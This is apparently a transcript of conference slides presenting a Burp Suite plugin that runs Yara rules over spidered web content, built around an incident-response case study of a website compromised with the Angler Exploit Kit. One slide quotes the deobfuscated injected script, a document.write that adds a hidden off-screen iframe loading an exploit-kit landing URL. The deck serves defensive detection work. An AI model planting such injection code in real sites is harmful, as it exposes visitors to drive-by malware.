burpsuite yara
TRANSCRIPT
![Page 1: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/1.jpg)
Burpsuite / Yara Integration
Ian DuffyPolito, Inc.@politoinc
![Page 2: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/2.jpg)
Introduction
• Who am I?• About Burpsuite and Yara• Case study: A compromised website• Plugin development• Future Roadmap• Questions
![Page 3: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/3.jpg)
Who am I?
• Former USAF network defender• Current cybersecurity consultant for Polito• Background in penetration testing (traditional
and web application) as well as Malware analysis
• Current duties involve malware analysis and threat hunting
![Page 4: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/4.jpg)
Burpsuite
• Burpsuite is a MITM proxy tool for viewing, intercepting, modifying, and transmitting HTTP(S) requests and responses.
• Allows the user to view all web content down to the byte level, to include static pages, JavaScript, JSON, WebSockets, and much more.
• Includes several tools for assessing the security of web applications
![Page 5: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/5.jpg)
BurpSuite
![Page 6: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/6.jpg)
Yara
• Yara is a sophisticated pattern matching tool• Specifies a language for describing strings,
binary / hexadecimal data, file offset information, file structure information in order to write pattern matching rules
• Rules can be run against one or many files or data streams in order to find matches
![Page 7: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/7.jpg)
Yara Rules Example
![Page 8: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/8.jpg)
Case Study
• Client contacts Polito and says that their IT department is getting phone calls stating that their website is causing “FireEye Alerts” and is likely compromised
• Polito is asked to investigate and determine:– Whether the site is actually compromised– If so, scope, scale, and impact of the compromise
![Page 9: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/9.jpg)
Case Study
• We request a tarball of the current webroot folder and a dump of any backend CMS databases
• In the meantime we begin spidering the website using Burpsuite…
![Page 10: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/10.jpg)
Case Study
Highly obfuscated JavaScript – interesting…
![Page 11: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/11.jpg)
Case Study
• The obfuscated JavaScript is consistent with the Angler Exploit Kit, which matches the alerts reported by our client’s IT department
• After deobfuscation of the JavaScript we see the following:
document.write('<style>.ddidfodevxgsz{position:absolute;top:-907px;width:300px;height:300px;}</style><div class="ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/consent/knife-lodge-19720974" width="250" height="250"></iframe></div>');
![Page 12: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/12.jpg)
Case Study
![Page 13: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/13.jpg)
Case Study
• Problems:– How do we identify whether this EK landing page /
malicious JavaScript has been inserted into any other pages on the site?
– How do we identify whether the attackers have left themselves a back door?
![Page 14: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/14.jpg)
Case Study
• Possible Solutions– Wait for three days before client can get tarball of
their website uploaded to our SFTP server– Manually search through online web content– Write something to automate our searching
![Page 15: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/15.jpg)
Writing Burpsuite Plugins
• Burpsuite supports plugins in Java, Ruby, and Python– Ruby requires JRuby– Python requires Jython
• We decided to use Python to develop our Yara integration for expedience
![Page 16: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/16.jpg)
The Plugin…
• Burpsuite specifies several interfaces for performing various tasks
• Depending on what functionality we are trying to implement, we must implement one or more of those interfaces
• The interfaces specify methods that must be implemented in order to handle events from the Burpsuite UI
![Page 17: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/17.jpg)
The Plugin…
• Each of the interfaces requires specific methods be implemented– IBurpExtender requires a method named
registerExtenderCallbacks– Itab requires methods named getTabCaption and
getUIComponent• Documentation for the interfaces is available
at:– https://portswigger.net/burp/extender/api/index.html
![Page 18: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/18.jpg)
The Plugin…
• Our basic use case was as follows:– Burpsuite user spiders a website to retrieve as
much of the content as possible– User right-clicks on website in Burp UI and selects
“Scan with Yara”– Yara is used to scan the content of the web
requests and responses– Results displayed to user in a Tab
![Page 19: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/19.jpg)
Jython
• Jython is a hybrid between Java and Python• You can “import” Java classes, instantiate Java
objects, and call their methods via Python code:
![Page 20: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/20.jpg)
Jython
• Java objects are instantiated by calling a contructor method with the same name as the class– No “new” keyword like in Java– Parameters to the constructors are the same
• Once instantiated, class objects can be used just as with Java
![Page 21: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/21.jpg)
Demonstration
Live demo time – this always works!
![Page 22: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/22.jpg)
Future Roadmap
• Things that we are looking into:– Live Yara scanning as you surf– Persistent configuration settings– Multiple rules files
• Your thoughts and feature requests are most welcome!
![Page 23: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/23.jpg)
Grab a Copy
• Plugin is available on our Github site:• https://github.com/PolitoInc/Yara-Scanner
• Please send any feedback to [email protected]
![Page 24: Burpsuite yara](https://reader036.vdocuments.pub/reader036/viewer/2022062822/587c717e1a28abd04e8b5bc7/html5/thumbnails/24.jpg)
Questions?
Ian DuffyPolito, Inc.@politoinc
www.politoinc.com
Thank You!